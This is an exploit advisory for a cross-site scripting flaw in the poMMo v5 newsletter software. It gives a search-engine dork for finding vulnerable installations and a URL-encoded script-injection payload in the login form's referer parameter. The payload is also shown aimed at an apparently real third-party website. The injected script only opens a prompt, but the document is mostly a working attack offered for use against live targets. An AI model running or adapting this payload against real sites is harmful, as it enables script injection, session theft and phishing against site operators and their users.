====================================================================================================================================
| # Title : poMMo v5 XSS Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) | |
| # Vendor : http://www.pommo.org/ |
| # Dork : - Page activée par le logiciel de mailing poMMo - |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : index.php/submit=Connexion&password=ppp%24%24w0rD&referer=/newsletter/admin/admin.php'%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&username=rtybcmhusubmit=Connexion&password=pp&referer=/newsletter/admin/admin.php'%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&username=rtybcmhu
http://www.lagrandesante.com/newsletter/index.php/submit=Connexion&password=ppp%24%24w0rD&referer=/newsletter/admin/admin.php'%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&username=rtybcmhusubmit=Connexion&password=pp&referer=/newsletter/admin/admin.php'%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&username=rtybcmhu
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |
|
=======================================================================================================================================